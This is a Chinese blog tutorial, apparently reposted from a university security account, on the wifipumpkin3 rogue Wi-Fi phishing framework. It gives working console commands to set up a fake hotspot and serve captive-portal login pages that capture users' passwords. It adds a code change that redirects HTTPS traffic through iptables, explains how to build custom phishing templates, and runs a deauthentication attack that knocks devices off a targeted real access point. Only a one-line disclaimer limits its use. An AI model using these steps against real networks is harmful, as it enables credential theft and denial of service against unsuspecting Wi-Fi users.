wifipumpkin3 wifi钓鱼工具简介

admin 2021年6月19日12:26:52评论550 views字数 2883阅读9分36秒阅读模式

简介

本文仅供技术交流使用,请勿用于非法途径

wifipumpkin3是用Python编写wifi钓鱼攻击强大框架

可以快速方便的搭建一个钓鱼wifi,进行钓鱼或中间人攻击,免去了手动搭建环境的繁琐步骤

支持的攻击种类有:

  • 恶意访问点攻击
  • 中间人攻击
  • 死角接入点攻击
  • 额外的captiveflask模板
  • DNS劫持
  • 俘虏门户攻击 (captiveflask)
  • 拦截,检查,修改和重放网络流量
  • WiFi网络扫描
  • DNS监控服务
  • 凭证收集
  • 透明代理
  • LLMNR,NBT-NS和MDNS 投毒(Responder3)
  • and more!

安装

使用环境:kali 2021.2

网卡:RTL8812AU-VS(802.11ac 2x2 USB2.0)

依赖安装

sudo apt install hostapd  
sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5

框架安装

git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install

安装完成后使用sudo wifipumpkin3命令即可开启框架

wifipumpkin3 wifi钓鱼工具简介
image-20210305152836412

使用

搭建简单钓鱼热点

使用以下命令可以建立起一个简单的热点

# 设置热点名称
wp3 > set ssid evil
# 选择网卡
wp3 > set interface wlan0
# 设置代理插件(后面会讲)
wp3 > set proxy noproxy
wp3 > start
wifipumpkin3 wifi钓鱼工具简介
image-20210305153536348

这时我们就能搜索到搭建的热点

wifipumpkin3 wifi钓鱼工具简介
image-20210305153658637

可以正常连接,同时,我们的kali上也会显示连接情况

wifipumpkin3 wifi钓鱼工具简介
image-20210305153813696

利用captiveflask强制用户登录

captiveflask是框架中代理功能中的一个选项,他可以阻止连接此wifi的用户上网,并令http请求跳转到钓鱼登录页面,从而获取用户的账号密码

以内置的登录网页为例

wifipumpkin3/wifipumpkin3/plugins/captiveflask目录,有四个内置登录网页

wifipumpkin3 wifi钓鱼工具简介
image-20210306093505716

我们此次使用DarkLogin.py

# 设置热点名称
wp3 > set ssid evil
# 选择网卡
wp3 > set interface wlan0
# 设置代理插件
wp3 > set proxy captiveflask
# 设置模板
wp3 > set captiveflask.DarkLogin true
wp3 > start

通过proxies命令可以看到现在启用的插件和代理

wifipumpkin3 wifi钓鱼工具简介
image-20210306093747947

此时链接wifi,即可显示登录页面

wifipumpkin3 wifi钓鱼工具简介
image-20210306093906002

如果在此页面输入账号密码,就会被捕获

wifipumpkin3 wifi钓鱼工具简介
image-20210306101029507

未登录前所有http网站都无法访问,但是要注意的是,此插件无法拦截https流量

如果想要拦截https流量,需要做以下修改:

设定拦截https

首先关闭wifipumpkin3

修改wifipumpkin3/core/servers/proxy/captiveflask.py,在第119行添加如下

print(display_messages("redirecting HTTPS traffic", info=True))
        self.add_default_rules(
            "{iptables} -t nat -A PREROUTING -i {iface} -p tcp --dport 443 -j DNAT --to-destination {ip}:443".format(
                iptables=self.getIptablesPath, iface=IFACE, ip=IP_ADDRESS, port=PORT
            )
        )
wifipumpkin3 wifi钓鱼工具简介
image-20210306100406123

此时所有https流量均转发至本地443端口

sudo python3 setup.py install

再次访问就无法打开https页面

wifipumpkin3 wifi钓鱼工具简介
image-20210306100549929

自定义登录门户页面

首先在wifipumpkin3/wifipumpkin3/plugins/captiveflask目录添加一个模板

我们把DarkLogin.py复制一份,重命名为test.py

吧DarkLogin全替换为test

wifipumpkin3 wifi钓鱼工具简介
image-20210306100743007

随后修改配置文件wifipumpkin3/config/app/captive-portal.ini

wifipumpkin3 wifi钓鱼工具简介
image-20210306101146288

接着把前端模板按照flask的目录格式,放到wifipumpkin3/config/templates/test文件夹下

wifipumpkin3 wifi钓鱼工具简介
image-20210306101418527

重新编译后启动

wp3 > set ssid evil
wp3 > set interface wlan0
wp3 > set proxy captiveflask
wp3 > set captiveflask.test true
wp3 > start
wifipumpkin3 wifi钓鱼工具简介
image-20210306101610741

链接wifi,发现跳转到自定义页面

wifipumpkin3 wifi钓鱼工具简介
image-20210306101709299

执行wifi取消身份验证攻击

为了能让大部分设备连接我们的钓鱼热点,我们需要通过取消身份验证攻击令连接真实热点的设备掉线

什么是wifi取消身份验证攻击?

wifi取消身份验证攻击是一种拒绝服务攻击,它以用户和wifi接入点之间的通信为目标。

攻击者可以随时将带有身份验证对象欺骗地址的取消身份验证帧发送到无线访问点,令对象掉线。

wp3 > use wifi.wifideauth
wp3 : wifideauth > set interface wlan0
wp3 : wifideauth > scan
wifipumpkin3 wifi钓鱼工具简介
image-20210306110857069

将信道切换为11

wifipumpkin3 wifi钓鱼工具简介
image-20210306110951692

选择一个bssid

wp3 > use wifi.wifideauth
wp3 : wifideauth > set interface wlan0
wp3 : wifideauth > set target xx:xx:e2:e8:e4
wifipumpkin3 wifi钓鱼工具简介
image-20210306113056012

start运行后,目标wifi即无法连接

如果想将身份验证攻击与钓鱼热点结合使用,则需要准备俩网卡


本文始发于微信公众号(山警网络空间安全与电子数据取证):wifipumpkin3 wifi钓鱼工具简介

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月19日12:26:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   wifipumpkin3 wifi钓鱼工具简介https://cn-sec.com/archives/288690.html

发表评论

匿名网友 填写信息